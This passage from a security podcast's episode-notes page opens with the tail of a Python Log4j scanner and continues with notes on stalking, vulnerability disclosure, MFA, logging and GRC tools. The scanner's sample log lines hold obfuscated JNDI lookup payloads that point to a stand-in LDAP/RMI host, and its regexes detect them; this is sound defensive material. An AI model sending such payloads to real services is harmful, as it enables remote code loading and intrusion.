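    '10.0.0.9 - - [11/Dec/2021:03:13:02 +0000] "GET /?x=${${lower:j}${upper:n}${lower:d}i:rmi://198.51.100.23/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.12 - - [11/Dec/2021:03:14:10 +0000] "GET / HTTP/1.1" 200 612 "-" "%24%7Bjndi%3Adns%3A%2F%2Fexample-canary.invalid%2Fx%7D"',
    '10.0.0.13 - - [11/Dec/2021:03:15:00 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.23/c}"',
    '10.0.0.14 - - [11/Dec/2021:03:16:00 +0000] "GET / HTTP/1.1" 200 612 "-" "${env:HOME} mentions jndi but is no lookup"',
]

# ${lower:x} / ${upper:x} resolve to x; ${anything:-x} resolves to its default x.
CASE_LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Log4j lower-cases the lookup prefix before dispatch, so match jndi case-insensitively.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*([^}]*)\}", re.IGNORECASE)


def url_decode(text: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (double-encoding is common)."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def normalize(text: str, max_passes: int = 20) -> str:
    """Collapse nested Log4j lookups until the string stops changing."""
    text = url_decode(text)
    for _ in range(max_passes):
        new = CASE_LOOKUP_RE.sub(lambda m: m.group(1).lower(), text)
        new = DEFAULT_LOOKUP_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(text: str):
    """Return (scheme, callback host, normalized lookup) for a JNDI lookup, or None."""
    norm = normalize(text)
    m = JNDI_RE.search(norm)
    if not m:
        return None
    scheme = m.group(1).lower()
    target = f"{scheme}:{m.group(2).strip()}"   # e.g. ldap://198.51.100.23:1389/a
    host = urllib.parse.urlsplit(target).hostname
    return scheme, host, m.group(0)


def scan_lines(lines):
    """One finding per access-log line that carries a JNDI lookup after de-obfuscation."""
    findings = []
    for line in lines:
        hit = find_jndi(line)
        if hit is None:
            continue
        scheme, host, lookup = hit
        findings.append({"src": line.split(" ", 1)[0], "scheme": scheme,
                         "callback_host": host, "lookup": lookup})
    return findings


def callback_hosts(findings):
    """Distinct callback hosts: the list an egress block rule or DNS sinkhole needs."""
    return sorted({f["callback_host"] for f in findings if f["callback_host"]})


if __name__ == "__main__":
    found = scan_lines(SAMPLE_LOG_LINES)
    for f in found:
        print(f)
    print("callback hosts:", callback_hosts(found))
```

The normalizer deliberately bounds both the decode rounds and the lookup passes so a crafted log line cannot make the scanner loop forever; a line that still contains `${` after the bound is worth a manual look even when `find_jndi` returns None.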

Dec 16, 2021 - 36 min

S2021 Ep 44 2021-044-Litmoose discusses stalking and protecting yourself


New $3 patron! 🎉 Thank you John K.!
National Domestic Violence Hotline at 1-800-799-7233, or by online chat.
National Sexual Assault Hotline at 1-800-656-4673, or by online chat.
https://www.stalkingawareness.org/wp-content/uploads/2019/01/SPARC_StalkngFactSheet_2018_FINAL.pdf
STALKING VICTIMIZATION
An estimated 6-7.5 million people are #stalked in a one-year period in the United States. Nearly 1 in 6 women and 1 in 17 men have experienced stalking victimization at some point in their lifetime. Using a less conservative definition of stalking, which considers any amount of fear (i.e., a little fearful, somewhat fearful, or very fearful), 1 in 4 women and 1 in 13 men reported being a victim of stalking in their lifetime. About half of all victims of stalking indicated that they were stalked before the age of 25.
Stalkers use many tactics, including: approaching the victim or showing up in places where the victim didn't want them to be; making unwanted telephone calls; leaving the victim unwanted messages (text or voice); watching or following the victim from a distance; spying on the victim with a listening device, camera, or #GPS (or #IoT device).
https://www.vice.com/en/article/d3akpk/smart-home-technology-stalking-harassment
https://www.ucl.ac.uk/steapp/sites/steapp/files/giot-report.pdf - Tech Abuse Gender and IoT Research Report
https://www.researchgate.net/publication/260867980_TRAPPED_TECHNOLOGY_AS_A_BARRIER_TO_LEAVING_AN_ABUSIVE_RELATIONSHIP
Center to End Technical #Abuse (CETA): https://www.ceta.tech.cornell.edu/resources
https://82beb9a6-b7db-490a-88be-9f149bafe221.filesusr.com/ugd/c4e6d5_20fe31daffd74b2fb4b4735d703dad6a.pdf - disconnect checklist
TW (stalking resulting in death): 'A pattern of fixation and obsession': How the #pandemic exacerbated stalking cases in the UK - https://www.independent.co.uk/life-style/women/stalking-cases-pandemic-gracie-spinks-b1956589.html
https://pathwaystosafety.org/staying-safe/
https://www.techsafety.org/
https://static1.squarespace.com/static/51dc541ce4b03ebab8c5c88c/t/61674c082419497a370af990/1634159630368/2021_T2E+Needs+Assessment+Report.pdf - "'Smart' or connected devices, often referred to as the Internet of Things (IoT), turn up in cases 'all the time' or 'often' for a third of advocates and 1 in 5 #legal systems professionals. While this is rather low, people are increasingly using these types of technology. With additional use we may see increases in abuse through them. Additionally, advocates and legal systems professionals are often not aware of how these technologies can be misused, so they may not ask about them."

Dec 13, 2021 - 59 min

2021-043- Fred Jennings, Vuln Disclosure policy, VEP, and 0day disclosure - p2

https://twitter.com/Esquiring - Fred Jennings
Vulnerabilities Equities Process (VEP), vulnerability disclosure program (VDP), and what is the best way to disclose a 0day? ('proper' is different and dependent)
This show was inspired by this Tweet thread from @k8em0 and @_MG_: https://twitter.com/k8em0/status/1459715464691535877 https://twitter.com/_MG_/status/1459718518346174465
Legal safe harbor? Copyleft for security researchers…?
What is a VEP? Not a new concept (2014): https://obamawhitehouse.archives.gov/blog/2014/04/28/heartbleed-understanding-when-we-disclose-cyber-vulnerabilities
Context: written when Heartbleed came out. About transparency, but within reason.
From the blog post: "We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability: How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems? Does the vulnerability, if left unpatched, impose significant risk? How much harm could an adversary nation or criminal group do with knowledge of this vulnerability? How likely is it that we would know if someone else was exploiting it? How badly do we need the intelligence we think we can get from exploiting the vulnerability? Are there other ways we can get it? Could we utilize the vulnerability for a short period of time before we disclose it? How likely is it that someone else will discover the vulnerability? Can the vulnerability be patched or otherwise mitigated?"
Gov orgs involved in VEP: https://en.wikipedia.org/wiki/Vulnerabilities_Equities_Process
Assessing the Vulnerabilities Equities Process, Three Years After the VEP Charter
Companies have a VEP too (every time they issue a patch), but they aren't always transparent about it. Embargoes aplenty:
https://www.redhat.com/en/blog/security-embargoes-red-hat
https://xenproject.org/developers/security-policy/ (creates a caste system of 'haves and have-nots'... important vs. not important); bad guys will target the people not on the inside.
0days benefit from a non-transparent VEP.
https://www.randori.com/blog/why-zero-days-are-essential-to-security/ - Randori had 365day…
https://twitter.com/_MG_/status/1459024603263557633
https://twitter.com/JimSycurity/status/1459152870490574854
Preferred patch 8.1.17, issued October 2020
VEP does not always have to be about 0day… it can be about solutions to issues: https://www.techdirt.com/articles/20210922/17095747614/fbi-sat-ransomware-decryption-key-weeks-as-victims-lost-millions-dollars.shtml - "The FBI refrained for almost three weeks from helping to unlock the computers of hundreds of businesses and institutions hobbled by a major ransomware attack this summer, even though the bureau had secretly obtained the digital key needed to do so, according to several current and former U.S. officials. The key was obtained through access to the servers of the Russia-based criminal gang behind the July attack. Deploying it immediately could have helped the victims, including schools and hospitals, avoid what analysts estimate was millions of dollars in recovery costs."
In a perfect world, what does disclosure look like?
Communication (easy, secure, detailed… pick 1)
Separating wheat from chaff - 'lol, i got root, pay me plz'
Fear of NDAs and gag clauses
Do people expect to be paid? Setup of a 'cheap' program? What if you don't have a budget to pay out (or, more accurately, mgmt won't pay out)? People won't disclose? Should you pay? Use a 3rd party?

Nov 21, 2021 - 39 min

2021-042- Fred Jennings, VDP, Vuln Equity, And 0day disclosure - p1

https://twitter.com/Esquiring - Fred Jennings
Vulnerabilities Equities Process (VEP), vulnerability disclosure program (VDP), and what is the best way to disclose a 0day? ('proper' is different and dependent)
This show was inspired by this Tweet thread from @k8em0 and @_MG_: https://twitter.com/k8em0/status/1459715464691535877 https://twitter.com/_MG_/status/1459718518346174465
Legal safe harbor? Copyleft for security researchers…?
What is a VEP? Not a new concept (2014): https://obamawhitehouse.archives.gov/blog/2014/04/28/heartbleed-understanding-when-we-disclose-cyber-vulnerabilities
Context: written when Heartbleed came out. About transparency, but within reason.
From the blog post: "We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability: How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems? Does the vulnerability, if left unpatched, impose significant risk? How much harm could an adversary nation or criminal group do with knowledge of this vulnerability? How likely is it that we would know if someone else was exploiting it? How badly do we need the intelligence we think we can get from exploiting the vulnerability? Are there other ways we can get it? Could we utilize the vulnerability for a short period of time before we disclose it? How likely is it that someone else will discover the vulnerability? Can the vulnerability be patched or otherwise mitigated?"
Gov orgs involved in VEP: https://en.wikipedia.org/wiki/Vulnerabilities_Equities_Process
Assessing the Vulnerabilities Equities Process, Three Years After the VEP Charter
Companies have a VEP too (every time they issue a patch), but they aren't always transparent about it. Embargoes aplenty:
https://www.redhat.com/en/blog/security-embargoes-red-hat
https://xenproject.org/developers/security-policy/ (creates a caste system of 'haves and have-nots'... important vs. not important); bad guys will target the people not on the inside.
0days benefit from a non-transparent VEP.
https://www.randori.com/blog/why-zero-days-are-essential-to-security/ - Randori had 365day…
https://twitter.com/_MG_/status/1459024603263557633
https://twitter.com/JimSycurity/status/1459152870490574854
Preferred patch 8.1.17, issued October 2020
VEP does not always have to be about 0day… it can be about solutions to issues: https://www.techdirt.com/articles/20210922/17095747614/fbi-sat-ransomware-decryption-key-weeks-as-victims-lost-millions-dollars.shtml - "The FBI refrained for almost three weeks from helping to unlock the computers of hundreds of businesses and institutions hobbled by a major ransomware attack this summer, even though the bureau had secretly obtained the digital key needed to do so, according to several current and former U.S. officials. The key was obtained through access to the servers of the Russia-based criminal gang behind the July attack. Deploying it immediately could have helped the victims, including schools and hospitals, avoid what analysts estimate was millions of dollars in recovery costs."
In a perfect world, what does disclosure look like?
Communication (easy, secure, detailed… pick 1)
Separating wheat from chaff - 'lol, i got root, pay me plz'
Fear of NDAs and gag clauses
Do people expect to be paid? Setup of a 'cheap' program? What if you don't have a budget to pay out (or, more accurately, mgmt won't pay out)? People won't disclose? Should you pay? Use a 3rd party?

Nov 21, 2021 - 36 min

Blumira Sponsor #3 - Emily Eubanks, more actionable events, incident response help, and more

In this sponsored BDS episode, Bryan Brake and Amanda Berlin interview Emily Eubanks, a Security Operations Analyst for #Blumira. We discuss common business risks like IT staff turnover, a lack of incident response procedures, choosing not to follow PowerShell best practices, and MFA use for critical or sensitive applications. We also discuss ways to improve security posture to mitigate these risks, as well as how Blumira can help organizations in light of these common business challenges.

ADDITIONAL RESOURCES
OUR REDDIT AMA: https://www.reddit.com/r/cybersecurity/comments/qao73j/we_are_a_security_team_with_20_years_of_ethical/
MFA: https://attack.mitre.org/mitigations/M1032/ https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984 https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
INCIDENT RESPONSE: https://www.nist.gov/cyberframework/respond https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
POWERSHELL BEST PRACTICES: https://www.blumira.com/analysis-of-a-threat-powershell-malicious-activity/ https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/ https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/

MFA
RISK: A lack of MFA where it is available, or using SMS-based MFA for critical applications. Please do not use SMS-based MFA for critical applications. [6] [7] MFA is an easy layer of defense that has historically been very effective. [5] One-Time Passwords (OTP) are good, but [8] FIDO U2F is better. Consider hardware tokens (e.g. Yubico YubiKey, Google Titan Security Key).
MITIGATION / BLUMIRA HELPS: Blumira requires use of MFA; MFA-related detections (e.g. AWS, Duo).

Incident Response Procedures
RISK: A lack of incident response procedures, or the decision to postpone incident response procedures because they would result in a disruption in service, typically results in unfavorable outcomes. You want a written plan that identifies the roles, responsibilities, and procedures that should be set in motion once an incident has been declared. If this is overwhelming to conceptualize, know that there are a good number of free and openly available resources already in existence to help with the creation of new IR plans. I highly recommend looking at the NIST documentation to get an idea of what is possible and then scaling to what is appropriate for your organization. [4] The plan should be reviewed at a minimum once annually, with everyone who is responsible for responding to incidents present. If anybody is unclear on their role, responsibilities or procedures, then the incident response lead should work with them to get them there. Incident response procedures should be like a fire drill, so that when there is a real fire the team can work together to quickly put that fire out and minimize impact to the company and its customers. (Shoutout to the BDS podcast on drawing connections from firefighting to incident response procedures with Dr. Catherine J. Ullman (@investigatorchi).)
MITIGATION / BLUMIRA HELPS: Workflows: Blumira helps with this by providing built-in guidance with workflows. Workflows ask direct questions and provide specific options to record responses to security findings, to guide practitioners towards a conclusion. Finding analysis: provides additional details to help operators make informed decisions in response to new findings.

Recent or Frequent IT Staff Turnover
RISK: Impedes troubleshooting of log flow and/or investigations due to a lack of familiarity with the network environment. Prevention might be the best solution? Giving your workers time during the work week to improve a work-related skill can help identify when a team is reaching or exceeding its resource capacity. If your team is overworked they are more likely to make mistakes, will be less prepared to go the extra mile when it is needed because they'll already be tapped out of energy, and may be more likely to consider opportunities elsewhere. You want to limit keystone employees, meaning that if an employee leaves for whatever reason you do not want that employee's absence to cause a breakdown in processes for others. Redundancy is best here in most cases, IMO.
MITIGATION / BLUMIRA HELPS: Blumira works hard to create fewer, more actionable findings. We strive to keep our alerts simple, to provide the information that operators need to make informed decisions. We try to focus on findings that require action, and provide workflows with additional guidance and recommendations on what to investigate next to evaluate the impact of a security event.

PowerShell Scripting Best Practices
RISK: Detections will be less helpful if staff are frequently dismissing events in response to approved administrative behavior like maintenance scripts. Follow the PowerShell recommendations shared by Microsoft [1], including: Sign your scripts (lol Microsoft has this b

Nov 21, 2021 - 53 min

S2021 Ep 41 2021-041-0day disclosure, Randori, FBI email server pwnage


https://www.bleepingcomputer.com/news/security/us-education-dept-urged-to-boost-k-12-schools-ransomware-defenses/
https://securityaffairs.co/wordpress/124570/cyber-crime/fbi-hacked-email-server.html
https://www.zdnet.com/article/security-company-faces-backlash-for-waiting-12-months-to-disclose-palo-alto-0-day/
https://www.randori.com/blog/why-zero-days-are-essential-to-security/
https://twitter.com/_MG_/status/1459024603263557633 - "Hey... did anyone notice that PAN 0day was fixed in a version that was released over a year ago? Guess it wasn't easy to notice under all the loud opinions about ethics." https://twitter.com/_MG_/status/1459038747807285253/photo/1

Nov 16, 2021 - 36 min

S2021 Ep 40 2021-040-Sweden's parents rebel over poor app design, US government forcing patching of systems, and vuln chaining


News stories covered this week, as well as links of note:
https://www.wired.co.uk/article/sweden-stockholm-school-app-open-source
https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a
https://docs.google.com/presentation/d/17gISafUZzEyjV7wkdHaTQZmtxstBqECa/edit#slide=id.p4
https://www.securityweek.com/braktooth-new-bluetooth-vulnerabilities-could-affect-millions-devices
https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
https://searchsecurity.techtarget.com/news/252509040/CISA-cracks-the-whip-on-patching-vulnerabilities
https://cyber.dhs.gov/bod/22-01/
https://www.cisa.gov/known-exploited-vulnerabilities-catalog

Nov 8, 2021 - 36 min

S2021 Ep 39 2021-039-Minimum Viable vendor security sheet, Federal logging requirements, and more!


https://securityaffairs.co/wordpress/123948/security/2021-list-of-most-common-hardware-weaknesses.html
https://www.whitehouse.gov/wp-content/uploads/2021/08/M-21-31-Improving-the-Federal-Governments-Investigative-and-Remediation-Capabilities-Related-to-Cybersecurity-Incidents.pdf
https://www.darkreading.com/application-security/tech-companies-create-security-baseline-for-enterprise-software
https://security.googleblog.com/2021/10/launching-collaborative-minimum.html
https://mvsp.dev/mvsp.en/index.html
https://www.standardfusion.com/blog/assessing-vendor-risk-with-questionnaires/

Nov 2, 2021 - 55 min

SPONSOR-Blumira's Nato Riley on Log Classification, Security Maturity,


From Nato's email: "Hi Bryan, Discussing the challenges that come with not having good logging in place could be a great topic! We could make it partly about how security maturity works, in the idea that security generally starts with awareness and visibility. The topic sort of gets into the idea that knowing is half the battle, so logging can be transformative for helping a company properly secure themselves from online risks! What do you think of this topic idea?"
https://www.blumira.com/careers/
https://thenewstack.io/logging-and-monitoring-why-you-need-both/
https://prometheus.io/
https://www.sentinelone.com/blog/the-10-commandments-of-logging/
https://towardsdatascience.com/why-should-you-care-about-logging-442a195b80a1
https://www.g2.com/products/blumira-automated-detection-response/reviews#survey-response-4908309
(wouldn't you know it… a couple of additional Google searches, and I find this -brbr) https://www.executivegov.com/2021/08/omb-creates-maturity-framework-for-event-log-management/
https://insidecybersecurity.com/sites/insidecybersecurity.com/files/documents/2021/may/cs2021_0089c.pdf
Logging maturity in the US gov (OMB policy doc): https://www.whitehouse.gov/wp-content/uploads/2021/08/M-21-31-Improving-the-Federal-Governments-Investigative-and-Remediation-Capabilities-Related-to-Cybersecurity-Incidents.pdf
Are there examples of devices that don't give out logs? What if your vendor does not allow you to have logs? Can you create logs based on the activity of the device? What would that look like?
Types of logs: application logs, network logs, endpoint security logs, OS logs, IDS/IPS logs, vuln scanner logs
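Added example, not from the episode or Nato's email: a Python log normaliser that maps several of the log types listed above onto one schema, tags each event with its type, and then checks which expected sources have gone quiet, which is the "awareness and visibility" step the email describes and the first thing a SIEM needs before classification or correlation is possible. The five input lines are constructed (hostnames, IPs and vendor names are invented, and the syslog year is an assumption because RFC 3164 timestamps carry none). Format detection is deliberately by shape (syslog PRI header, JSON object, CEF prefix, key=value pairs) rather than by a per-vendor parser.

```python
import json
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

# Constructed sample lines (not from the episode): hostnames, IPs and vendor
# names are invented. One line per log type in the notes, plus a second OS log
# from a firewall that stopped logging 45 minutes before the check below.
SAMPLE_LINES = [
    "<86>Nov  1 09:12:01 web01 sshd[4121]: Accepted publickey for deploy from 10.0.0.7 port 51022 ssh2",
    '{"ts":"2021-11-01T09:12:05Z","app":"billing-api","level":"WARN","msg":"login failed","user":"alice","src":"203.0.113.9"}',
    "CEF:0|ExampleVendor|ExampleIDS|1.0|1001|ET SCAN Nmap Scripting Engine|5|rt=1635757927000 src=203.0.113.9 dst=10.0.0.20 spt=44321 dpt=443",
    "time=2021-11-01T09:12:09Z host=wks-17 vendor=ExampleEDR event=process_blocked image=C:\\Users\\bob\\x.exe",
    "<38>Nov  1 08:30:44 fw-edge kernel: DROP IN=eth0 SRC=198.51.100.77 DST=10.0.0.1 PROTO=TCP DPT=22",
]
ASSUMED_YEAR = 2021  # assumption: RFC 3164 syslog timestamps carry no year
EXPECTED_HOSTS = {"web01", "wks-17", "fw-edge", "db01"}  # assumed asset list; db01 never logs
CHECK_TIME = datetime(2021, 11, 1, 9, 15, tzinfo=timezone.utc)
MAX_GAP = timedelta(minutes=5)

SYSLOG_RE = re.compile(r"^<(\d{1,3})>([A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) ([^:]+): (.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass
class Event:
    ts: datetime
    category: str          # os | application | ids | endpoint
    host: str
    src_ip: Optional[str]
    summary: str
    raw: str


def _iso(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def normalize_line(line: str) -> Event:
    """Detect the log type by shape and map the line onto the common schema."""
    line = line.rstrip("\n")
    m = SYSLOG_RE.match(line)
    if m:  # OS log: RFC 3164 syslog; severity is PRI mod 8
        pri, stamp, host, tag, msg = m.groups()
        ts = datetime.strptime(stamp, "%b %d %H:%M:%S").replace(year=ASSUMED_YEAR, tzinfo=timezone.utc)
        ip = IPV4_RE.search(msg)
        return Event(ts, "os", host, ip.group(1) if ip else None, f"{tag} sev={int(pri) % 8}: {msg}", line)
    if line.startswith("{"):  # application log: one JSON object per line
        d = json.loads(line)
        return Event(_iso(d["ts"]), "application", d.get("app", "?"), d.get("src"),
                     f"{d.get('level')} {d.get('msg')}", line)
    if line.startswith("CEF:"):  # IDS/IPS log: 7 pipe-separated header fields, then key=value extensions
        header = line.split("|", 7)
        ext = dict(KV_RE.findall(header[7]))
        ts = datetime.fromtimestamp(int(ext["rt"]) / 1000, tz=timezone.utc)  # rt is epoch milliseconds (assumed present)
        return Event(ts, "ids", header[2], ext.get("src"), f"{header[5]} severity={header[6]}", line)
    kv = dict(KV_RE.findall(line))
    if {"time", "host", "vendor", "event"} <= kv.keys():  # endpoint security log: key=value pairs
        return Event(_iso(kv["time"]), "endpoint", kv["host"], None, f"{kv['event']} {kv.get('image', '')}", line)
    raise ValueError(f"unrecognised log format: {line[:40]!r}")


def normalize_all(lines):
    return [normalize_line(line) for line in lines]


def count_by_category(events):
    counts = {}
    for e in events:
        counts[e.category] = counts.get(e.category, 0) + 1
    return counts


def quiet_sources(events, expected_hosts, now, max_gap):
    """Expected sources with no event inside max_gap: value is last-seen time, or None if never seen."""
    last_seen = {}
    for e in events:
        if e.host not in last_seen or e.ts > last_seen[e.host]:
            last_seen[e.host] = e.ts
    return {h: last_seen.get(h) for h in sorted(expected_hosts)
            if last_seen.get(h) is None or now - last_seen[h] > max_gap}


def run_demo():
    """Counts per log type and the quiet-source report for the constructed sample."""
    events = normalize_all(SAMPLE_LINES)
    return count_by_category(events), quiet_sources(events, EXPECTED_HOSTS, CHECK_TIME, MAX_GAP)


if __name__ == "__main__":
    counts, quiet = run_demo()
    print("events by type:", counts)
    for host, seen in quiet.items():
        print(f"quiet source {host}: last seen {seen.isoformat() if seen else 'never'}")
```

The quiet-source check is the practical answer to "what if a device stops giving you logs": a source that should be in the expected list and has not been heard from is itself a finding, and the asset list it compares against has to come from somewhere other than the logs.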

Nov 1, 2021 - 44 min

S2021 Ep 38 2021-038-Liz Saling, 5 pillars of building a good team


Blog post that inspired this episode: https://lizsaling.com/SWE-team-five-pillars/
Liz Saling (@lizsaling)
https://www.mindtools.com/pages/article/newLDR_86.htm
http://www.mspguide.org/tool/tuckman-forming-norming-storming-performing
https://michaelhyatt.com/3-roadblocks-to-avoid-for-optimal-team-performance
Erin Meyer is the one who did the Netflix study! https://bigthink.com/the-present/high-performing-teams/
https://alicedartnell.com/blog/why-smart-goals-are-stupid/
NEWS:
Unlocking 'god mode' on Windows 11: https://www.bleepingcomputer.com/news/microsoft/how-to-unlock-windows-11s-god-mode-to-access-advanced-settings/
https://www.reddit.com/r/netsec/comments/q9f63y/creating_a_basic_python_reverse_shell_listener/
NFT malware (NFTs that empty wallets): https://www.theregister.com/2021/10/17/in_brief_security/

Oct 25, 2021 - 1h 7m

S2021 Ep 36 2021-037-Tony Robinson, leveraging your home lab for job success - Part2


Tony Robinson (@da_667)
Thought we'd put in a little news to round out the show:
https://www.bbc.com/news/world-us-canada-58863678 - nuclear secrets hidden in a peanut butter sandwich
https://www.theregister.com/2018/04/20/rsa_security_conference_insecure_mobile_app/
https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch
https://nakedsecurity.sophos.com/2021/10/08/apache-patch-proves-patchy-now-you-need-to-patch-the-patch/
https://www.securityweek.com/fontonlake-linux-malware-used-targeted-attacks
https://securityaffairs.co/wordpress/123182/breaking-news/medtronic-recalled-insulin-pumps-controllers.html - similar device on eBay: https://www.ebay.com/itm/324762812721
https://www.zdnet.com/article/brewdog-exposed-data-of-200000-shareholders-for-over-a-year/
https://tpetersonkth.github.io/cve/2021/10/02/Analysis-of-CVE-2019-9053.html
https://0xdf.gitlab.io/
www.leanpub.com/avatar2 - MSRP = $30 USD
Book changes
What is the end goal? Upskill? Independent consultant? Promotion? Bug bounties?
Lab setup - lab setup types: cloud based - desktop/laptop/NUC - server
Good VMs to https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ - 90-day Windows machines
What other home lab equipment would be helpful? Testing IoT/embedded devices? Car hacking? Malware analysis? https://bazaar.abuse.ch/ VirusTotal Intelligence, honeypots, @malware_traffic - https://twitter.com/malware_traffic/status/1446627364147023877
Analyzing binaries? Patch analysis (Patch Tuesday, PrintNightmare, etc.)? https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html https://www.netresec.com/?page=networkminer
Soldering? Oscilloscopes for voltage checks? Wireless? Old cellphones (mobile apps, don't need cellular)? Personal assistant devices (used IoT devices)? Accessing data stored on devices? Specific software licenses? Burp?
If I'm trying to break into infosec, how do I use my lab to sell myself to an employer? Does the employer care?
How can someone show what they've learned in a way that shows the value?

Oct 17, 2021 - 57 min

S2021 Ep 36 2021-036-Tony Robinson, Twitch breach, @da_667 lab setup new book edition! - part1


Tony Robinson (@da_667)
Thought we'd put in a little news to round out the show:
https://www.bbc.com/news/world-us-canada-58863678 - nuclear secrets hidden in a peanut butter sandwich
https://www.theregister.com/2018/04/20/rsa_security_conference_insecure_mobile_app/
https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch
https://nakedsecurity.sophos.com/2021/10/08/apache-patch-proves-patchy-now-you-need-to-patch-the-patch/
https://www.securityweek.com/fontonlake-linux-malware-used-targeted-attacks
https://securityaffairs.co/wordpress/123182/breaking-news/medtronic-recalled-insulin-pumps-controllers.html - similar device on eBay: https://www.ebay.com/itm/324762812721
https://www.zdnet.com/article/brewdog-exposed-data-of-200000-shareholders-for-over-a-year/
https://tpetersonkth.github.io/cve/2021/10/02/Analysis-of-CVE-2019-9053.html
https://0xdf.gitlab.io/
www.leanpub.com/avatar2 - MSRP = $30 USD
Book changes
What is the end goal? Upskill? Independent consultant? Promotion? Bug bounties?
Lab setup - lab setup types: cloud based - desktop/laptop/NUC - server
Good VMs to https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ - 90-day Windows machines
What other home lab equipment would be helpful? Testing IoT/embedded devices? Car hacking? Malware analysis? https://bazaar.abuse.ch/ VirusTotal Intelligence, honeypots, @malware_traffic - https://twitter.com/malware_traffic/status/1446627364147023877
Analyzing binaries? Patch analysis (Patch Tuesday, PrintNightmare, etc.)? https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html https://www.netresec.com/?page=networkminer
Soldering? Oscilloscopes for voltage checks? Wireless? Old cellphones (mobile apps, don't need cellular)? Personal assistant devices (used IoT devices)? Accessing data stored on devices? Specific software licenses? Burp?
If I'm trying to break into infosec, how do I use my lab to sell myself to an employer? Does the employer care?
How can someone show what they've learned in a way that shows the value?

Oct 14, 2021 - 53 min

2021-035-GRC selection discussion, TechSecChix, and the 'job description problem'

GRC tools (Governance, Risk and Compliance)
@ki_twyce_ @TechSecChix - Infosec Unplugged, Security Happy Hour, Eric's Cyberpoppa show, Cyber Insight show (co-host)
Blumira is hiring: https://www.blumira.com/careers/
https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html
https://www.pwc.ch/en/insights/fs/10-pitfalls-when-implementing-grc-technology-and-how-to-avoid-them.html
https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/
Why do we need a GRC tool? https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register
What are our business goals? (to make money... :D ) Are we mature enough to be measuring ourselves? How can we use this to be more efficient?
https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/ - centralized controls; support for future standards; automation integrations (my add: helpdesk integrations, 3rd party); scalability; customizable reporting; flexibility; task delegation
GRC tool use in other areas:
IT - makes more informed budget decisions, determines direction of business goals, asset mgmt
Finance - make better financial decisions, profitability
Infosec - vuln mgmt, compliance
HR - determine hiring requirements
Legal - ensures ethical management of the organization, reduces breach exposure
How do you implement GRC? https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation
Step 0: everyone's input and use cases
Determine the total value gained by using a centralized GRC platform: missing data; duplicate processes; duplicate data; manual steps that can be removed or automated; workflows to assist heavily manual areas such as communications, emails, approvals, and reporting
Identify operational gaps to prioritize the areas you need to improve.
Get your team on board with an effectively communicated plan.
Build a strong foundation to support your GRC program.
Deploy a standardized GRC implementation across the board.
Let the GRC framework evolve and grow after it's implemented.

Sep 29, 2021 - 1h 6m

S2021 Ep 34 2021-034-Khalilah Scott, good GRC tool practices - part1


GRC tools (Governance, Risk and Compliance)
@ki_twyce_ @TechSecChix - Infosec Unplugged, Security Happy Hour, Eric's Cyberpoppa show, Cyber Insight show (co-host)
Blumira is hiring: https://www.blumira.com/careers/
https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html
https://www.pwc.ch/en/insights/fs/10-pitfalls-when-implementing-grc-technology-and-how-to-avoid-them.html
https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/
Why do we need a GRC tool? https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register
What are our business goals? (to make money... :D ) Are we mature enough to be measuring ourselves? How can we use this to be more efficient?
https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/ - centralized controls; support for future standards; automation integrations (my add: helpdesk integrations, 3rd party); scalability; customizable reporting; flexibility; task delegation
GRC tool use in other areas:
IT - makes more informed budget decisions, determines direction of business goals, asset mgmt
Finance - make better financial decisions, profitability
